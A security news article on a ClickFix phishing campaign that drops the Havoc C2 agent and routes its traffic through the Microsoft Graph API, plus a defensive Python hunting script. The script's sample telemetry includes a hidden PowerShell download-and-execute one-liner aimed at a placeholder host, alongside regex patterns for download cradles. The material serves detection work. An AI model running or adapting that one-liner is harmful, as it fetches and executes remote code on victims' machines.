
Cybercriminals are using a phishing technique called ClickFix to covertly deliver the Havoc C2 agent, with SharePoint serving the later stages. Researchers from Fortinet FortiGuard Labs found that the attackers route the command-and-control traffic through the Microsoft Graph API, so the agent's requests look like ordinary Microsoft 365 activity rather than beaconing to an attacker-owned host.
The attack begins with phishing emails carrying an HTML attachment named “Documents.html”, which displays a fake error page. The page tells the user to "fix" the error by copying a PowerShell command and running it themselves; this is the ClickFix trick, in which the victim, not an exploit, starts the payload. The command checks the runtime environment and, if the system is not a sandbox, fetches a Python interpreter and runs a Python script that loads the Havoc agent through KaynLdr, Havoc's loader. From that point the operators control the infected device through Havoc C2: they can execute commands, download files, and manipulate access tokens.
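As an added illustration (not part of the original report or of Fortinet's analysis), the following Python script shows how a defender might hunt for the two stages described above in endpoint telemetry: a shell started by hand from the Run dialog with a download-and-execute one-liner, and a Graph API connection from a process that has no business making one. The Sysmon-style events, paths, regexes and the allowlist of expected Graph clients are all constructed for this example and would need tuning to a real estate.

```python
from __future__ import annotations

import re

# Constructed Sysmon-style telemetry (Event ID 1 = process creation,
# Event ID 3 = network connection). Field names follow Sysmon's schema;
# the paths, hosts and command lines are made up for this example and
# are not indicators from the reported campaign.
SAMPLE_EVENTS = [
    {   # ClickFix: user pastes a one-liner into the Run box, explorer.exe is the parent
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -nop -ep bypass -c "iwr http://203.0.113.10/s.ps1 | iex"',
    },
    {   # Benign maintenance script launched from cmd.exe
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell -File C:\Scripts\backup.ps1",
    },
    {   # A Python interpreter dropped in %TEMP% talking to the Graph API
        "EventID": 3,
        "Image": r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
        "DestinationHostname": "graph.microsoft.com",
        "DestinationPort": 443,
    },
    {   # Outlook talking to the Graph API: expected
        "EventID": 3,
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "DestinationHostname": "graph.microsoft.com",
        "DestinationPort": 443,
    },
]

# Interpreters a pasted ClickFix command typically lands in.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# The Run dialog (Win+R) is hosted by explorer.exe, so a shell whose parent
# is explorer.exe was most likely started by hand rather than by a script.
RUN_DIALOG_PARENTS = {"explorer.exe"}
# Command-line traits of a typical pasted one-liner: (pattern, label).
SUSPICIOUS_ARGS = [
    (re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+\S"), "encoded command"),
    (re.compile(r"(?i)(^|\s)-(ep|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b"), "download cradle"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "in-memory execution"),
]
# Hosts a Graph-API-based C2 channel would reach, and the processes we expect
# to talk to them. The allowlist is an assumption; tune it to your estate.
GRAPH_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}
EXPECTED_GRAPH_CLIENTS = {"outlook.exe", "teams.exe", "ms-teams.exe", "onedrive.exe",
                          "msedge.exe", "chrome.exe", "firefox.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev: dict) -> tuple[bool, list[str]]:
    """Return (spawned from the Run dialog?, matched command-line traits)."""
    if basename(ev.get("Image", "")) not in SHELL_IMAGES:
        return False, []
    from_run_dialog = basename(ev.get("ParentImage", "")) in RUN_DIALOG_PARENTS
    cmd = ev.get("CommandLine", "")
    traits = [label for pattern, label in SUSPICIOUS_ARGS if pattern.search(cmd)]
    return from_run_dialog, traits


def score_network_event(ev: dict) -> list[str]:
    """Flag Graph API connections from processes that should not make them."""
    host = ev.get("DestinationHostname", "").lower()
    image = basename(ev.get("Image", ""))
    if host in GRAPH_HOSTS and image not in EXPECTED_GRAPH_CLIENTS:
        return [f"{image} connected to {host} but is not an expected Graph client"]
    return []


def triage(events: list[dict]) -> list[dict]:
    """Run both rules over a list of events and return the alerts raised."""
    alerts = []
    for idx, ev in enumerate(events):
        if ev.get("EventID") == 1:
            from_run_dialog, traits = score_process_event(ev)
            # One suspicious switch is common in admin scripts; require either
            # two traits, or one trait plus the hand-started parent process.
            if len(traits) >= 2 or (from_run_dialog and traits):
                reasons = (["shell started from explorer.exe (Run dialog)"] if from_run_dialog else []) + traits
                alerts.append({"event": idx, "rule": "clickfix-execution", "reasons": reasons})
        elif ev.get("EventID") == 3:
            reasons = score_network_event(ev)
            if reasons:
                alerts.append({"event": idx, "rule": "unexpected-graph-client", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"event {alert['event']}: {alert['rule']}: " + "; ".join(alert["reasons"]))
```

Run against the constructed sample, the first process event and the Python-to-Graph connection are flagged while the scheduled backup script and Outlook's Graph traffic are not. The network rule is deliberately coarse: it does not try to tell a malicious Graph request from a benign one by content, since both are TLS to the same Microsoft endpoint, which is exactly why the attackers chose that channel; it leans on which process is speaking instead.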
Havoc C2 is an open-source command-and-control framework that attackers use as an alternative to Cobalt Strike: it lets them remotely control compromised systems, evade antivirus protection, and steal data.
Similar techniques have been seen before, including phishing campaigns that abused Google's advertising platform to steal PayPal credentials.
Attackers keep refining ways to launch malware stealthily, abusing trusted services to slip past defences. Companies are advised to tighten their controls, for example by restricting PowerShell execution for users who do not need it (ClickFix relies on the victim running the command by hand, so the restriction must cover interactive use, not just scripts), and by carefully checking the origin of email attachments, HTML attachments in particular.